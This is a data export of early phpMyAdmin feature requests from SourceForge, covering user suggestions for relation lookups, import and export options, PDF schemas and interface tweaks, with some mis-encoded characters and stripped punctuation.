For instance Table 1 ArticleGroups Field 1 GroupNo Field 2 GroupName Records 1;MyFirstArticle 2;MySecondArticle 3;MyThirdArticle Table 2 Articles Field 1 ArticleNo Field 2 GroupNo Field 3 ArticleName Records 1;1;CoolThing 2;1;PrettyCoolThing 3;2;UnCoolThing 4;3;UglyThing Table PMA relation Field 1 master db Field 2 master table Field 3 master field Field 4 master cb show field Field 5 oreign db Field 6 foreign table Field 7 foreign field Record MyMasterDB;ArticleGroups;No;GroupName;MyMaster DB;Articles;ArticleNo = amp;gt; GroupName in PMA relation will cause that in Add Change Record of Articles a Combobox with this MyFirstArticle MySecondArticle MyThirdArticle will be shown as field for GroupNo.
The GroupNo 1,2,3) should be stored instead of the Name of course.
The reason for this Idea corresponds to MS ACCESS.
Entering a new record in a releated Table you need a more speaking sollution to find the right Number for the joined field.
Greetings Gregor Original URL https sourceforge.net p phpmyadmin feature requests 221 https sourceforge.net p phpmyadmin feature requests 221 Original author anonymous","enhancement"
"24444","4924","Performance Graph.
Have you guys considered providing a graph to show performance load over time of the tables i.e.
the average length of each query), queries per second... etc... something similiar to http www.mysql.com downloads mysqlgui polygraph 1.html This may seem like it would be re inventing the wheel, but it would be useful for people who don t have X access on the server I apologize if this has been mentioned already... Art Original URL https sourceforge.net p phpmyadmin feature requests 222 https sourceforge.net p phpmyadmin feature requests 222 Original author anonymous","enhancement"
"24444","4925","No LIMIT clause with the quot;Create PHP Code quot; link.
The Create PHP Code Link always attaches the LIMIT 0,50 text to the end of a query.
To me this seems like incorrect behavior.
It should not include a limit by default.
Original URL https sourceforge.net p phpmyadmin feature requests 223 https sourceforge.net p phpmyadmin feature requests 223 Original author utoxin","enhancement"
"24444","4926","Limit usage to certain tables.
As there is an option to limit phpMyAdmin to use certain Databases it would be nice to have an limit for certain tables.
For example you have only one database at your provider and someone needs direct access to some tables.
As there could be more tables you probably don t want the person to have access to that tables, too.
So I suggest to have a tableLimit option where you either can put in an array of allowed tables or a sort of mask like progx Original URL https sourceforge.net p phpmyadmin feature requests 225 https sourceforge.net p phpmyadmin feature requests 225 Original author triphoenix","enhancement"
"24444","4927","Deleting PDF pages.
How about adding an option to delete a PDF page?
At the moment 2.3.0) one has to delete rows directly from the PMA pdf pages table...
Original URL https sourceforge.net p phpmyadmin feature requests 226 https sourceforge.net p phpmyadmin feature requests 226 Original author xneo","enhancement"
"24444","4928","Page should fit on 800x600 window.
With the addition of tabs to the phpMyAdmin interface, there is now a horizontal scrollbar when browsing any table due to the tabs going off the edge.
Tabs shouldn t make the page much wider than normal.
Original URL https sourceforge.net p phpmyadmin feature requests 227 https sourceforge.net p phpmyadmin feature requests 227 Original author sourceo","enhancement"
"24444","4929","Field names on csv export.
Would it be possible to add an option to include the field names as the first line on export to CSV?
This is occasionally helpful when dealing with large amounts of data in Excel.
Original URL https sourceforge.net p phpmyadmin feature requests 229 https sourceforge.net p phpmyadmin feature requests 229 Original author anonymous","enhancement"
"24444","4930","show sql sentence when we edit a row.
Now, phpmyadmin shows sql sentences when you make a select, insert a row, alter table...
But when a row is edited, the sentence is not shown, and we are returned to the amp;quot;browse amp;quot; page; there the sentence that we can see is amp;quot;select from... amp;quot; instead amp;quot;update ... amp;quot; I think the two sentences must be shown Original URL https sourceforge.net p phpmyadmin feature requests 230 https sourceforge.net p phpmyadmin feature requests 230 Original author anonymous","enhancement"
"24444","4931","Several relations with 1 primary key.
in real databases you will find several relations PK FK relations with one primary key.
it should be very useful, to have this implemented Original URL https sourceforge.net p phpmyadmin feature requests 231 https sourceforge.net p phpmyadmin feature requests 231 Original author toza","enhancement"
"24444","4932","Separator in new relation drop down.
I would like a better way to separate the related values from their foreign values in the new drop downs showing possible values from a related table.
The values are now separated by a a hyphen).
See row 426 in tbl change.php, v1.108.
If you have related values that contain hyphens, it is almost impossible to see what is the related value and what is the foreign value.
I think the best solution is to use a hyphen surrounded by spaces) to separate them.
Original URL https sourceforge.net p phpmyadmin feature requests 232 https sourceforge.net p phpmyadmin feature requests 232 Original author bth","enhancement"
"24444","4933","IN ) functionality in select by example.
On the select tab of a table i really miss the IN ) functionality in the amp;quot;query by example amp;quot; table numfunctions ???)
where you can quickly select a few rows on an INT n) field.
Problem might be the leading and trailing and ) Tr909 Original URL https sourceforge.net p phpmyadmin feature requests 233 https sourceforge.net p phpmyadmin feature requests 233 Original author tr909","enhancement"
"24444","4934","data form field.
user should be able to enter database name when logins cookie auth) if he has not privileges to view all databases.
Original URL https sourceforge.net p phpmyadmin feature requests 234 https sourceforge.net p phpmyadmin feature requests 234 Original author anonymous","enhancement"
"24444","4935","MySQL 4.1 Support.
Hi, it seems that phpMyAdmin can not work with MySQL 4.1.0 because they are using a new charset type.
I tried vresion 2.3.0 rc3 2.3.2 2.3.3 dev There is nothing to do, I ve got other friends who have the same problem.
Just onescreen shot You ll notice the added charset text near TEXT VARCHAR CHAR entities) http infocenter.d2g.com error.jpg Original URL https sourceforge.net p phpmyadmin feature requests 242 https sourceforge.net p phpmyadmin feature requests 242 Original author anonymous","enhancement"
"24444","4936","Dont select all in query TEXTAREA.
When using Linux amp;gt; X Window amp;gt; KDE, it is quite annoying that the onfocus handler of the query textarea selects all text therein.
This is because the X Window system puts selected text into the clipboard.
THUS, overwriting what was there probably a customised query I want to try on the database).
So whenever I click in the query textarea, what is there suddenly replaces what I wanted to have in the clipboard.
grrr...
I wrote a little javascript `onfocus stopper` for my own personal use.
Its interface shows as a checkbox above the textarea in the screenshot attached.
This feature request is quite urgent, I think.
Best regards Jonas Widarsson Alfta, Sweden email jonaswidarsson home.se Original URL https sourceforge.net p phpmyadmin feature requests 235 https sourceforge.net p phpmyadmin feature requests 235 Original author anonymous","enhancement"
"24444","4937","Set All Values to something.
I want to change all the values of a table to something like for example... Row1 | Row2 | Row3 I want all Row3 values to be something... changed all at once.
D Original URL https sourceforge.net p phpmyadmin feature requests 236 https sourceforge.net p phpmyadmin feature requests 236 Original author anonymous","enhancement"
"24444","4938","deal better with lost found.
Linux uses lost found directories in the partition root.
Because I ve got mysql data files on their dedicated partitions there is a lost found directory in with the data.
I can change the permissions of this directory so only root can access it but phpMyAdmin still attempts to use it as if it is data.
I made this modification to ignore this file to the script left.php line 332 changed from \} else \{ changed to \} elseif db != lost found ) \{ this does not solve problems if use tries to create a database called lost found which will cause problems there too.
Perhaps the code needs to be changed there so no one can create a database with that name.
Of course they could still manually do it via SQL but that is MySQL s problem there.
Original URL https sourceforge.net p phpmyadmin feature requests 237 https sourceforge.net p phpmyadmin feature requests 237 Original author jjcarlson","enhancement"
"24444","4939","Import tab.
As suggested by some users, they see amp;quot;Export amp;quot; so they are looking for Import.
A distinct Import tab or a combined Export import tab) could have the amp;quot;Insert data from textfile dialog amp;quot;.
I am not sure about this one a lot of users see amp;quot;Location of the textfile amp;quot; but they are are looking for amp;quot;import amp;quot; or amp;quot;run sql file amp;quot;.
So should we put the file chooser also on the Import tab?
Original URL https sourceforge.net p phpmyadmin feature requests 238 https sourceforge.net p phpmyadmin feature requests 238 Original author lem9","enhancement"
"24444","4940","DESIGN) SQL Parser reworking.
The SQL Parser I wrote originally, while getting very close to how things should work, has a few flaws to it.
This needs to be remedied to fix all the bugs around how SQL is pretty printed, and is also needed for the long term SQL validation goals.
There are two distinct parts to the parser system each with a couple of sub parts).
Firstly, there is the input system.
It has two parts, a tokenizer and an analyzer.
Tokenizer needs to tokenize all of the SQL input, paying attension to the specialized needs of MySQL some of the token rules ARE distinctly different from ANSI SQL).
Analyzer Needs to look at each token in relation to those around it, and determine what type of token it is.
This includes noting reserved words, column types, brackets and TYPEs of brackets), operators, constants, strings and a number of other things.
These are already defined thru the SQL parser system, but a formal list of them should be made.
The combined output of the input system forms a large array.
This array can then be stored, or fed directly to an output function.
the output functions can pretty print the query in HTML text or something else, or do something more significent with it.
An SQL validator was planned at one stage, as a long term goal eg if the MySQL server returns an error, see if we can help the user out more in locating the error).
The core parts of this system are the input systems.
It shold be possible to re write the input systems and keep the output systems unchanged, although the HTML pretty printer was never completed, so it still needs work.
In the current code, the tokenizer and analyzer are integrated into a single function, because it was convient at the time, and was slightly faster O n) instead of O 1.5 n) ).
However properly implemented I think seperate tokenizer and analyzers could possibly be faster.
Original URL https sourceforge.net p phpmyadmin feature requests 239 https sourceforge.net p phpmyadmin feature requests 239 Original author robbat2","enhancement"
"24444","4941","with selected add check option.
In database structure, a set of tables can be selected as well as a command which will be perform on them.
There is a repair table and optimize table, but no check table.
But I like to check them, i.e.
like to know that they are corrupt, before I fire the repair command.
Original URL https sourceforge.net p phpmyadmin feature requests 240 https sourceforge.net p phpmyadmin feature requests 240 Original author ci dev","enhancement"
"24444","4942","?)
logging all changes.
When phpMyAdmin is used to administer a database by a couple of users it would be very useful to have it either logging all the changes in a designated text file what change was made, who made it user from htaccess, when was it made).
Original URL https sourceforge.net p phpmyadmin feature requests 241 https sourceforge.net p phpmyadmin feature requests 241 Original author anonymous","enhancement"
"24444","4943","SQL Query Backticks vs. single quotes.
Hi there, the SQL query input field shows backticks ` ) instead of single quotes ) which is a difference and really hard to differenciate.
Compare SELECT FROM `table` vs.
SELECT FROM table This can make debugging queries really hard.
Also there s a strange WHERE 1 clause added by default.
Thanks for such a good work.
Keep it up!
Original URL https sourceforge.net p phpmyadmin feature requests 243 https sourceforge.net p phpmyadmin feature requests 243 Original author anonymous","enhancement"
"24444","4944","Tracking changes.
There should be an option to export the schema after each create or alter.
This will allow one to keep track of changes very easily.
Original URL https sourceforge.net p phpmyadmin feature requests 244 https sourceforge.net p phpmyadmin feature requests 244 Original author anonymous","enhancement"
"24444","4945","Saving queries to each db.
Hi all It would be great if one could save often used queries in phpMyAdmin to each db).
Cheers Bachi Original URL https sourceforge.net p phpmyadmin feature requests 252 https sourceforge.net p phpmyadmin feature requests 252 Original author bachi76","enhancement"
"24444","4946","Different paper sizes in PDF.
The PDF relationship diagram is very good.
However, it seems to only create PDF files in Letter 11.69 amp;quot; x 8.27 amp;quot; size pages.
This is no doubt a very good idea in the US, but Europeans tend to use A4 sized paper [297mm x 210mm] paper.
Also, some relationship diagrams can get quite big and it would be useful to be able to get these on a single page.
I was wondering if this could be made a configurable parameter?
Original URL https sourceforge.net p phpmyadmin feature requests 245 https sourceforge.net p phpmyadmin feature requests 245 Original author barrymyles","enhancement"
"24444","4947","Diff between two tables databases.
From Eric Persson Hi everyone, Some of you might remember I asked for a structure diff earlier, I want to compare 2 tables and get an alter query which would make the target table to look exactly like the original table.
I have now made a small hack which almost does this, at least it show the idea of what I want it to be.
I added the file diff tables.php which currently takes ?db as an get argument.
It shows the table in that database and you can pick 2 tables to compare and you get a hopefully working alter query. )
I modified left.php to show a link after the num tables, like diff) which goes to diff tables.php with ?db as the database.
If you want to try it out, patch your 2.3.2 version of phpmyadmin with the files, or visit http www.egp.cx phpMyAdmin 2.3.2 where I put up a patched version.
Please dont destroy the tables to much. )
Some ideas of what to improve maintain the order of the fields maintain keys indexes and auto increment fields make it possible to diff tables between databases make it possible to diff create table queries create a nice graphical view over whats added changed dropped Do you have any furhter suggestions?
Please comment and try it out and think about it.
The code is still very hacky, and I might have re invented the wheel in some places, but I m not yet familiar with all libraryfiles etc.
Best regards, Eric Original URL https sourceforge.net p phpmyadmin feature requests 246 https sourceforge.net p phpmyadmin feature requests 246 Original author lem9","enhancement"
"24444","4948","NEW EXPORT IDEA huge describition) !.
Ixc2x92ll explain how the phpMyAdmin can improve the import end export.
Mostly for huge !!)
.sql files.
Ixc2x92ll post it in some PMA forums because I donxc2x92t know where is the right place to post it the developer ppl.
Some projects have so much data, also on private sites that it seems to be impossible to export all the data in one step, so you have to separate your tables in equal packages.
But this is pain in the ass.
And mostly the DB tables are very various in size and length of the rows count.
For example a xc2x93nationxc2x94 table contains around 250 data rows and a xc2x93userxc2x94 table has 10.000 rows with an approx .sql text file size of 3 MB unpacked).
Well and thatxc2x92s are, for my example, only two tables from 30 all in all.
Ok, how can the phpMyAdmin solve this common problem.
My first idea is phpMyAdmin should also have the possibility to import gzip packed .sql files.
I donxc2x92t know how the gzip export works I hope PMA take a look into the server config files or so and if PMA find gzip he enable the function in the export dialog).
Well if that is correct why he does not support g)zip packed .sql files as well?
It should be very simple to add that function that the import file which extract the .sql file into the tmp folder at the server and import that file like PMA does it mostly well like the normal way of uploading a file.
Ok, that feature should drastically decrease the time of a sql upload because .sql files are text files which have mostly a compress rate by 50 xc2x96 90 percent.
Ok, how about a new idea which requires the upload directory support.
Well if you have the mysql DB as I explained in the example above PMA should use another tactic to have a successful export and import without errors and timeouts.
Thatxc2x92s what I want to figure out now.
My idea is based on the good old rar zip compressor which can handle multiply archive files.
Well how about to modify that idea to work with PMA as well.
What the PMA ppl have to do is that You should add a pull down menu were you can select a xc2x93stepsizexc2x94 from 500 up to 5000 query steps.
For example I select the 3000 Step and press export.
My example DB has approx after an one file export and .sql file with 30 querys which creates my tables and 60.000 INSERT querys.
All in all nearly 60.000 Querys.
60.000 3000 = 20 xc2x93stepsxc2x94.
So what means xc2x93stepsxc2x94.
The export process have to count all written Querys.
a function should count all tables and rows before the new export starts.
So the export file knows that a separated export with the given steps is what the user want.)
Ok, a function tells another function that we now knew that a separated export is required, so be it.
The export now counts all querys and take a break after the 3000xc2x92s query, close the file and create a new one, which starts from 3001 until 6000.
And so on until the last data is written to the .sql file.
The file names should be like this Webshop.part001.sql Webshop.part002.sql Webshop.part003.sql Or like this Webshop.part001.020.sql Webshop.part002.020.sql Webshop.part003.020.sql Which tells the import process how many files are a part of the whole import but its not necessary to have that syntax.
Well after the export is finished we have now 30 files where each file contains 3000 querys and its useless to know if it is a CREATE or and INSERT or and UPDATE or what ever xc2x96 query is query, thatxc2x92s all what has to count here.
the last file counts only the rest of the whole export may be lesser that 3000).
Ok, the download problem later.
The big advance to separate the whole export in defined query steps is that the files are very little and the import will have no timeout or error I hope that).
To separate the parts by tables is useless because one table has 30 rows and one other 20.000 as I explained before.
So, the import should be easy.
You have to upload all your files into the upload dir and tell the import dialog the first file which contains part001.sql.
The import function should take care of the rest.
The end of the import is when no part00?
File is anymore into the import dir.
Well we should add a function which counts all files and break when a part0XX file is lost.
That should be useful to prevent errors.
For example INSERT querys in a table which is not already created.
Ok, if the gzip import is made or allowed it would be great to have a gzip file which can be uploaded and you can also have .part0XX.sql in it.
This idea is useless when the import process imports all part0XX.sql files in one step.
I mean with ONE page call.
If so we have the same old problem with timeout on huge .sql imports.
So here is my idea All what you need is a session and or and popup which takes care of the separated import.
When a PMA check tells another function that the import itxc2x92s equal if from the gzip, the upload dir or may be from the normal upload) has parts PMA should open an popup which has the same functions like the normal import script but additionally the ability to recall itself !!!)
were a parameter tells the popup which is the next file and how many querys are already imported mostly for the final result in the normal window).
For example, when PMA has my 20 parts .sql import PMA open an Popup which tell the user xc2x93Attention that is an Import which has some steps, please be patient until the process is finished you can add here a number like part 1 20 or a faked process bar with 20 steps or something else)).
The popup will close itself at the end of the whole import, so take a cup of coffee of do something else until the import is finishedxc2x94.
The popup should close itself at the end and call the normal window which contains the PMA result page.
Well thatxc2x92s all.
You can use the session to save the informationxc2x92s for the next import call or the get method which Ixc2x92ll prefer here to be compatible with php3.
Here is idea how to create the multiply send dialog or function when xc2x93sendxc2x94 is chosen but also STEPs 3000 is selected.
After creating the part0XX files in the tmp dir a list with for my example 20 links should be created so that the user can download all the files.
Well I donxc2x92t know the way to create multiply downloads.
If someone has an idea feel free to add this to my idea.
I knew that some serious problems can be here, but well simply add a xc2x93profixc2x94 cfg variable which enable that.
Beginners can damage to much with that stuff described here.
But I hope someone who is more involved like me into the phpMyAdmin project takes a closer look at my idea.
Btw.
This separated export import is useless when xc2x93sendxc2x94 is not checked.
So when someone check the xc2x93stepsxc2x94 and does not checkd the xc2x93sendxc2x94 checkbox it simply should ignored.
Original URL https sourceforge.net p phpmyadmin feature requests 247 https sourceforge.net p phpmyadmin feature requests 247 Original author anonymous","enhancement"
"24444","4949","Make margins smaller.
With all the information that gets crammed on the screen, the default border margin looks like about 10 pixels?)
is a waste of space.
With 2 quick fixes I was able to gain some more realestate.. Add leftmargin= amp;quot;1 amp;quot; topmargin= amp;quot;1 amp;quot; marginwidth= amp;quot;1 amp;quot; marginheight= amp;quot;1 amp;quot; to the body tag in left.php and the include php file.
ie amp;lt;body leftmargin= amp;quot;1 amp;quot; topmargin= amp;quot;1 amp;quot; marginwidth= amp;quot;1 amp;quot; marginheight= amp;quot;1 amp;quot; amp;gt; This would be especially nice for those with smaller screens.
An even better idea would be to make these variables in the config file so we can set them to zero, 1, 10, whatever.
While I m here, I noticed that doing a file import that does not map 1 1 with the columns available is a bit of a pain.. we can enter a list of the columns to map to, but to get that list we have to write them down or open a second browser or know them by memory).
A much better option would be a pick list where we can turn off columns that don t exist in the csv txt file.
Thanks!
Chris Norman Original URL https sourceforge.net p phpmyadmin feature requests 256 https sourceforge.net p phpmyadmin feature requests 256 Original author anonymous","enhancement"
"24444","4950","import.
I would like to import csv datas from a file.
It could be great to import datas.
First, phpMyAdmin could create a new table, with datas.
In the future, other formats would arrive, and the datas would be imported in an exist table, with an interface to map fields.
regards Original URL https sourceforge.net p phpmyadmin feature requests 248 https sourceforge.net p phpmyadmin feature requests 248 Original author anonymous","enhancement"
"24444","4951","Relations) Relation overview and Multi Part Kyes.
Having a primary key consisting of more than one field it is not possible to define a relation to another table properly.
e.g.
Firm int Product int Both together define the primary key because the product ID is only unique for each firm.
Original URL https sourceforge.net p phpmyadmin feature requests 249 https sourceforge.net p phpmyadmin feature requests 249 Original author anonymous","enhancement"
"24444","4952","Highlight SQL fields.
If you use your own sql query, it would be cool if the rows fields after which you ve checked are highlighted.
As I have to do with tables with more than 30 rows fields, it is very annoying to search this while page for 1 row.
Example You entered the query amp;quot;SELECT FROM table WHERE row35 amp;gt; 100 AND row37 amp;lt; 20 amp;quot; In the result view, row35 and row37 should be highlighted.
Original URL https sourceforge.net p phpmyadmin feature requests 250 https sourceforge.net p phpmyadmin feature requests 250 Original author anonymous","enhancement"
"24444","4953","setting auto increment.
Please add a new feature under amp;quot;operations amp;quot; to change the auto increment value sql query alter table amp;lt;tablename amp;gt;, auto increment= amp;lt;new value amp;gt; this would be wonderful.
Thanks!
Original URL https sourceforge.net p phpmyadmin feature requests 251 https sourceforge.net p phpmyadmin feature requests 251 Original author anonymous","enhancement"
"24444","4954","SQL with no DB.
You can t send SQL request if you don t have a DB.
If i want to send a file with a amp;quot;CREATE DB XX amp;quot; command, i can t. Original URL https sourceforge.net p phpmyadmin feature requests 253 https sourceforge.net p phpmyadmin feature requests 253 Original author plom","enhancement"
"24444","4955","SQL with mysqldump.
I make a dump with mysqldump.exe Win32) When a send the file to phpMyAdmin it doesn t work because he find a SQL error with amp;quot; amp;quot; comment in the file.
I solve it with us sql = ereg replace amp;quot;\n [ \n] \n amp;quot;, amp;quot; amp;quot;, sql); to replace amp;quot; amp;quot; comment Original URL https sourceforge.net p phpmyadmin feature requests 254 https sourceforge.net p phpmyadmin feature requests 254 Original author plom","enhancement"
"24444","4956","Editing field comments on separate page.
Editing of field comments is now done on the page tbl relation.php3 though it does not have anything to do with relations, as I see it.
One example where the field comments are used is on the Data Dictionary page.
It isn t easy to guess that the field comments are set under amp;quot;Relation view amp;quot;.
I suggest the part for editing field comments on tbl relation.php3 is moved to a separate own) page.
And a link amp;quot;Field comments amp;quot; is added on tbl properties structure.php3.
Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin feature requests 255 https sourceforge.net p phpmyadmin feature requests 255 Original author bth","enhancement"
"24444","4957","Comments or user defined names for DBs.
Hi, I am using phpMyAdmin on database, where DBs are created automaticly with names Client01, Client02, Client03... and so on.
I have one db with table where I store the clients numers and names.
I want to see the names of the clients instead or as comment or and tooltips) of DB name.
Is this possible?
Maybe add some feature in next release as the way of column comments ) Thank you.
Original URL https sourceforge.net p phpmyadmin feature requests 257 https sourceforge.net p phpmyadmin feature requests 257 Original author manneveru","enhancement"
"24444","4958","Relational Inserts add new, search pop up.
Extend the relational functionality to where it is most needed the insert new record screen.
Once a relationship has been established, foreign key fields on the insert record page should switch to drop down menus with lookups to the specified display field.
In addition, a shortcut link should be added next to the drop down for amp;quot;add new amp;quot; which would link directly to an insert record screen preferably pop up, though those don t seem to be used in phpMyAdmin much) for the foreign table.
Instead of a drop down, a search lookup record pop up could be used, similar to user administration in PHPBB.
Original URL https sourceforge.net p phpmyadmin feature requests 258 https sourceforge.net p phpmyadmin feature requests 258 Original author djpretzel","enhancement"
"24444","4959","BLOB download upload.
Would it be possible to download and upload in a easy manner the BLOB content of a record?
Original URL https sourceforge.net p phpmyadmin feature requests 259 https sourceforge.net p phpmyadmin feature requests 259 Original author shuther","enhancement"
"24444","4960","edit delete links on joined tables.
Hi!
When working with my user database, I usually join more than one table to get an overview of all of each user s information.
Sometimes when a user registers, he misspells his e mail address, so I have to manually change it and send him his code.
What I m missing, is the edit links, when browsing the complete joined tables.
Would it be possible to fetch all primary keys from the joined tables and place edit links for all entries in the row, just like when browsing one table.
e.g.
edit tab1 | tab1field1 | tab1field2 | tab2field1 | tab2field2 edit tab2 And while you re at it, could you also add a delete function, in which all rows in the different tables would be deleted all at once?
Thanks and keep up the great work... Christoph Herold Original URL https sourceforge.net p phpmyadmin feature requests 260 https sourceforge.net p phpmyadmin feature requests 260 Original author coeamyd","enhancement"
"24444","4961","show warning when detecting trailing spaces in field names.
We use 2.3.3pl1 in an production environment.
An admin created a table with trailing spaces in some field names I don t know how, couldn t believe it).
I think it would be really a nice feature for phpMyAdmin to show a red warning when detecting trailing spaces in field names.
Original URL https sourceforge.net p phpmyadmin feature requests 261 https sourceforge.net p phpmyadmin feature requests 261 Original author tapo","enhancement"
"24444","4962","Parser) support UNION.
Support UNION statements in the parser and correctly split table references and select expressions.
Original URL https sourceforge.net p phpmyadmin feature requests 262 https sourceforge.net p phpmyadmin feature requests 262 Original author lem9","enhancement"
"24444","4963","Trim the name of a column when creating it !.
Good day, I would like to inform phpmyadmin support When i create a column with space at the end of column name, after when i query, there is an error on query...and it is difficult to find the error.
I think phpmyadmin should do a amp;quot;TRIM ) amp;quot; function and delete space when it create a new column name Please, inform phpmyadmin support to correct this problem Alain Original URL https sourceforge.net p phpmyadmin feature requests 263 https sourceforge.net p phpmyadmin feature requests 263 Original author anonymous","enhancement"
"24444","4964","Default Export options in config.
I often use export in PMA to synchronize tables databases between a test server and a real server.
All these times I have to set the radio buttons and checkboxes to the same settings that I want.
Therefore I would like to be able to set the default export settings in the config file.
This would also be a solution for feature request 680261 Structure and data) without changing the behavior for people who don t want it changed.
Original URL https sourceforge.net p phpmyadmin feature requests 271 https sourceforge.net p phpmyadmin feature requests 271 Original author bth","enhancement"
"24444","4965","Prefix filename w date on dump export.
Regarding config.inc.php, an option to set a prefix that can be prepended to the default filenames of dump files and exported files using system date and or time would be appreciated.
Changes made manually to accomplish this are in db details export.php filename = date amp;quot;Y amp;quot;).
.date amp;quot;m amp;quot;).
.date amp;quot;d amp;quot;).
.date amp;quot;Hi amp;quot;).
.
db; in tbl properties export.php filename = date amp;quot;Y amp;quot;).
.date amp;quot;m amp;quot;).
.date amp;quot;d amp;quot;).
.date amp;quot;Hi amp;quot;).
.
table; Original URL https sourceforge.net p phpmyadmin feature requests 264 https sourceforge.net p phpmyadmin feature requests 264 Original author faxrepair","enhancement"
"24444","4966","Display size of a BLOB field s content.
When browsing a table while cfg[ ShowBlob ] is FALSE, the contents of BLOB fields are represented by the placeholder string amp;quot;[BLOB] amp;quot;.
IMO it would be useful to add the number of bytes stored in a particular BLOB field.
For example amp;quot;[BLOB 14.6 KB] amp;quot;.
Original URL https sourceforge.net p phpmyadmin feature requests 265 https sourceforge.net p phpmyadmin feature requests 265 Original author mfichtner","enhancement"
"24444","4967","Add config option for old 2.2 table display format.
One of the features of PMA that I found the most user friendly was how every option and feature at the table level was available in one screen.
This continued through the 2.2 branch, and then was changed such that each feature had its own amp;quot;tab amp;quot; starting in 2.3.0.
While I recognize that the change was made to better organize features, it also makes certain things less ergonomic.
Consider 1) When I load up the details for a table, I often want to run a SQL query instantly.
Having to make one extra click to get to a SQL window doesn t seem like much effort, but when you do it hundreds of times and have to wait for a system response each time), it gets annoying.
2) Having the table s fields and field properties available to look at, while I m composing a SQL query, was a big help if I didn t remember the datatypes or field names.
Now they re on two separate screens and I have to either memorize it a big task for larger dbs) or open two windows.
Because of things like this, I ve resisted loading up 2.3.x instances and still often run 2.2.6 in some places, despite the many other advantages of the new versions.
As such, I request Please make a config option in config.inc.php to arrange table options in the old pre 2.3) format.
Turn it off by default, of course, but please give me and everyone else) the option.
I think you ve already got most of the necessary code lying around from previous branches, so it shouldn t be a big deal.
Thanks much, Steve Tyriel) Original URL https sourceforge.net p phpmyadmin feature requests 266 https sourceforge.net p phpmyadmin feature requests 266 Original author tyriel","enhancement"
"24444","4968","Generated SQL.
phpmyadmin, allow to use foreign relations, but, could you adapt the export of the table to generate, something which takes care of this in the generated sql?
It d ont have sens to propose this feature, if generated sql does not take care of it!
mysql support foreigm keys syntax, even without verifying!
Original URL https sourceforge.net p phpmyadmin feature requests 267 https sourceforge.net p phpmyadmin feature requests 267 Original author anonymous","enhancement"
"24444","4969","database schema to pdf.... it would really great if phpmyadmin was able to automaticaly place the table on the pdf!
It not seems to be very difficult...
Original URL https sourceforge.net p phpmyadmin feature requests 268 https sourceforge.net p phpmyadmin feature requests 268 Original author anonymous","enhancement"
"24444","4970","Default selection of Structure and data.
When exporting a table or database can Structure and data be selected as default, as I like several other people use this feature to backup my database, but occasionaly I forget to check this box so occasionally I only have backups of the database structure).
Currently I have managed to edit the PHP files, but its a bit of a pain todo this every time a new release is produced.
Original URL https sourceforge.net p phpmyadmin feature requests 269 https sourceforge.net p phpmyadmin feature requests 269 Original author anonymous","enhancement"
"24444","4971","Provide better TITLE tag.
PHPMYADMIN is great!
There is only one small thing that makes it difficult to work with it when you have several instances of it The title of the browser window is mostly) amp;quot;phpMyAdmin at localhost amp;quot;.
It would be really great and avoid many errors if the title would name the server url first )) Original URL https sourceforge.net p phpmyadmin feature requests 270 https sourceforge.net p phpmyadmin feature requests 270 Original author anonymous","enhancement"
"24444","4972","Login to an arbitrary MySQL server.
From the forum Perhaps it would be nice to offer, on the main phpMyAdmin startup page, an alternative to the predefined hosts in the config.inc.php file.
Perhaps there could be an option to connect to ANY mySQL database on ANY host.
If textboxes were provided for host name, database name, username and password, we wouldn t have to go editing the config.inc.php file every time we wanted to make a one off connection to a mySQL database.
Original URL https sourceforge.net p phpmyadmin feature requests 272 https sourceforge.net p phpmyadmin feature requests 272 Original author lem9","enhancement"
"24444","4973","INNO DB and foreign keys support.
It would be nice to have the features of INNO DB integrated in one the next releases, because MyISAM doesn t support foreign keys and this will make developing consistent applications much easier.
Original URL https sourceforge.net p phpmyadmin feature requests 278 https sourceforge.net p phpmyadmin feature requests 278 Original author anonymous","enhancement"
"24444","4974","Export multi table SELECT results.
It is currently 2.4.0rc1) not possible to do exports on SELECTS with more than one table.
I understand why this must be for the SQL generating exports if fields are from more than one table), but the other exports types work just fine so shouldn t the control be made in tbl properties export instead and then disable just the SQL exports if multi table?
Original URL https sourceforge.net p phpmyadmin feature requests 273 https sourceforge.net p phpmyadmin feature requests 273 Original author clindh","enhancement"
"24444","4975","Schema Output in Dia xml file.
Hi, phpMyAdmin just keeps on getting better.
I ve been making extensive use of the schema pdf export for a progress report I m writing, and it is great for such staticapplications.
For a demonstration, it might be nice to have the ability to export the schema to the xml Dia format, allowing a more dynamic view of the database structure.
Thanks for all the great work.
I use the code within phpMyAdmin for examples of well designed coding when I m doing my own.
vrteach Original URL https sourceforge.net p phpmyadmin feature requests 274 https sourceforge.net p phpmyadmin feature requests 274 Original author vrteach","enhancement"
"24444","4976","RECORD CHANGES tool needed by every developer.
you can define a point of table db strucuture and let phpmyadmin record all changes made trough the phpmyadmin interface or just create a sql diff file, because it is nearly impossible to recreate a table on a production system.
with this kind of tool you can work more effetive on updates.
thx, great program Original URL https sourceforge.net p phpmyadmin feature requests 275 https sourceforge.net p phpmyadmin feature requests 275 Original author kostaspyliouras","enhancement"
"24444","4977","Column order.
It would be nice if you could change the order of columns in a table.
Since there is no normal mysql function for such a thing it could be realised by making a dump of the table change the order.
Dropping the table and after that inserting the right order of columns.
Original URL https sourceforge.net p phpmyadmin feature requests 276 https sourceforge.net p phpmyadmin feature requests 276 Original author anonymous","enhancement"
"24444","4978","Show Table s number of Fields.
Sometimes it would be useful, for large tables, that we can see the number of fields along with table properties.
Keep doing excellent work.
TIA Original URL https sourceforge.net p phpmyadmin feature requests 277 https sourceforge.net p phpmyadmin feature requests 277 Original author anonymous","enhancement"
"24444","4979","Print Title or Header on the PDF schema.
Little request Print the name of the page on the PDF schema.
optional GRALL headers and footer with date of update of the schema amp;quot;Bravo amp;quot; for all your work guys.
Original URL https sourceforge.net p phpmyadmin feature requests 279 https sourceforge.net p phpmyadmin feature requests 279 Original author anonymous","enhancement"
"24444","4980","Defaults for PMA DBs in Config.
It would be nice on the config file so that the default db s for phpmyadmin would be completed.
and the user just has to un comment them.
Original URL https sourceforge.net p phpmyadmin feature requests 280 https sourceforge.net p phpmyadmin feature requests 280 Original author willlangford","enhancement"
"24444","4981","MIMEtypes and DB Comments visible where necessary.
Make sure that MIME Types and DB Comments are displayed where necessary db datadict.php3, db printview.php3, PDF Pages, tbl printview.php3.
Am I missing some pages?
Original URL https sourceforge.net p phpmyadmin feature requests 285 https sourceforge.net p phpmyadmin feature requests 285 Original author garvinhicking","enhancement"
"24444","4982","Master Interface?.
So that with one phpmyadmin install you could controller other servers without have it installed on that server?
It would be nice for people with more than one db server to able to manage it from one interface.
